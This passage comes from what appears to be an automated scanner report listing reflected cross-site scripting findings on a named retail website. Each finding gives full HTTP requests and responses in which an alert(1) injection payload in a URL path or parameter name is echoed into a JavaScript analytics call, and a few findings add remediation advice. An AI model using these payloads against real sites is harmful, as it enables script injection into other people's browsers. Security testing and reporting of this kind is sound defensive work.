Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:11:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=28bt0rb15rjl4hvgp96soe7p70; expires=Tue, 09-Nov-2010 17:11:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men7ca63"-alert(1)-"8f92cbce3aa/bags/");
//]]>
...[SNIP]...

1.88. http://www.fredperry.com/limited-edition/men/bags/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/bags/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22869"-alert(1)-"2f8729c9de1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/bags22869"-alert(1)-"2f8729c9de1/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:11:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=sc9er4klh7tb3b5pk845ru3dh5; expires=Tue, 09-Nov-2010 17:11:44 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/bags22869"-alert(1)-"2f8729c9de1/");
//]]>
...[SNIP]...

1.89. http://www.fredperry.com/limited-edition/men/bags/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/bags/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccefc"-alert(1)-"09f5c581780 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/bags/?ccefc"-alert(1)-"09f5c581780=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:10:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=rle2pg95m5vgh1oepgfpgeku56; expires=Tue, 09-Nov-2010 17:10:12 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30876

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/bags/?ccefc"-alert(1)-"09f5c581780=1");
//]]>
...[SNIP]...

1.90. http://www.fredperry.com/limited-edition/men/blank-canvas-stussy/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/blank-canvas-stussy/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87410"-alert(1)-"642ea0df71f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition87410"-alert(1)-"642ea0df71f/men/blank-canvas-stussy/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:09:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=65n5cjmvruquljc1oa0u0lpv05; expires=Tue, 09-Nov-2010 17:09:41 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition87410"-alert(1)-"642ea0df71f/men/blank-canvas-stussy/");
//]]>
...[SNIP]...

1.91. http://www.fredperry.com/limited-edition/men/blank-canvas-stussy/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/blank-canvas-stussy/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4bd9e"-alert(1)-"67a1afe9718 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men4bd9e"-alert(1)-"67a1afe9718/blank-canvas-stussy/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:10:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ge5scm29ad71fdltcr1kh3vfe2; expires=Tue, 09-Nov-2010 17:10:19 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men4bd9e"-alert(1)-"67a1afe9718/blank-canvas-stussy/");
//]]>
...[SNIP]...

1.92. http://www.fredperry.com/limited-edition/men/blank-canvas-stussy/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/blank-canvas-stussy/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2afe3"-alert(1)-"17e2dabd41a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/blank-canvas-stussy2afe3"-alert(1)-"17e2dabd41a/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:10:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=eofi4cehnhrq7cjhic94pg8n24; expires=Tue, 09-Nov-2010 17:10:40 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/blank-canvas-stussy2afe3"-alert(1)-"17e2dabd41a/");
//]]>
...[SNIP]...

1.93. http://www.fredperry.com/limited-edition/men/blank-canvas-stussy/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/blank-canvas-stussy/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e98e0"-alert(1)-"c82982309e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/blank-canvas-stussy/?e98e0"-alert(1)-"c82982309e0=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:09:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=8uq4t9tp6ek6qei8dt0k6npeg0; expires=Tue, 09-Nov-2010 17:09:12 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Stussy
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/blank-canvas-stussy/?e98e0"-alert(1)-"c82982309e0=1");
//]]>
...[SNIP]...

1.94. http://www.fredperry.com/limited-edition/men/british-collectables/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/british-collectables/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47139"-alert(1)-"b6d2d00f18f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition47139"-alert(1)-"b6d2d00f18f/men/british-collectables/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=sfu3s4rje88g7t3ohsukesr565; expires=Tue, 09-Nov-2010 17:14:09 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition47139"-alert(1)-"b6d2d00f18f/men/british-collectables/");
//]]>
...[SNIP]...

1.95. http://www.fredperry.com/limited-edition/men/british-collectables/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/british-collectables/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee4ce"-alert(1)-"3a91705cda8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/menee4ce"-alert(1)-"3a91705cda8/british-collectables/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ols796ihtsstq0v73n79ngdik2; expires=Tue, 09-Nov-2010 17:14:30 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/menee4ce"-alert(1)-"3a91705cda8/british-collectables/");
//]]>
...[SNIP]...

1.96. http://www.fredperry.com/limited-edition/men/british-collectables/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/british-collectables/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d891"-alert(1)-"954da85411 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/british-collectables7d891"-alert(1)-"954da85411/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=b1epgpls29dt2opr8uvoi9n5r4; expires=Tue, 09-Nov-2010 17:15:04 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/british-collectables7d891"-alert(1)-"954da85411/");
//]]>
...[SNIP]...

1.97. http://www.fredperry.com/limited-edition/men/british-collectables/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/british-collectables/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a4d7"-alert(1)-"2d4c44a3758 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/british-collectables/?3a4d7"-alert(1)-"2d4c44a3758=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:12:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ubuiuuhet0dis73pjekk81b9h3; expires=Tue, 09-Nov-2010 17:12:28 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46052

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> British
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/british-collectables/?3a4d7"-alert(1)-"2d4c44a3758=1");
//]]>
...[SNIP]...

1.98. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons-centenary-outfit/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/collaboration-raf-simons-centenary-outfit/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7fe56"-alert(1)-"1a825ea7b3d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

The sink here is the Google Analytics call pageTracker._trackPageview("..."), whose argument the server builds from the request URI; the same sink appears in every finding in this section, on the 404 template as well as on category pages. Echoing user-controllable data within a script context is inherently dangerous, so the application should stop building that string from the request: either omit the argument, so ga.js derives the path client-side from window.location, or pass the URI through a JavaScript-string escaper that encodes the double quote, backslash, angle brackets, ampersand and line terminators (including U+2028 and U+2029) as \xHH or \uHHHH sequences. HTML entity encoding is not a substitute inside a script block, where the HTML parser does not decode entities.

Request

GET /limited-edition7fe56"-alert(1)-"1a825ea7b3d/men/collaboration-raf-simons-centenary-outfit/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:12:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=i9k9giecjcr5q6n0askfpvs5f4; expires=Tue, 09-Nov-2010 17:12:49 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition7fe56"-alert(1)-"1a825ea7b3d/men/collaboration-raf-simons-centenary-outfit/");
//]]>
...[SNIP]...

1.99. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons-centenary-outfit/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/collaboration-raf-simons-centenary-outfit/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa46c"-alert(1)-"fd5429705a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

The sink here is the Google Analytics call pageTracker._trackPageview("..."), whose argument the server builds from the request URI; the same sink appears in every finding in this section, on the 404 template as well as on category pages. Echoing user-controllable data within a script context is inherently dangerous, so the application should stop building that string from the request: either omit the argument, so ga.js derives the path client-side from window.location, or pass the URI through a JavaScript-string escaper that encodes the double quote, backslash, angle brackets, ampersand and line terminators (including U+2028 and U+2029) as \xHH or \uHHHH sequences. HTML entity encoding is not a substitute inside a script block, where the HTML parser does not decode entities.

Request

GET /limited-edition/menaa46c"-alert(1)-"fd5429705a/collaboration-raf-simons-centenary-outfit/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=eiabdltr7afs24cjo1kl3f3fl4; expires=Tue, 09-Nov-2010 17:13:14 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29396

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/menaa46c"-alert(1)-"fd5429705a/collaboration-raf-simons-centenary-outfit/");
//]]>
...[SNIP]...

1.100. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons-centenary-outfit/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/collaboration-raf-simons-centenary-outfit/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2872"-alert(1)-"429b7d0d03a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

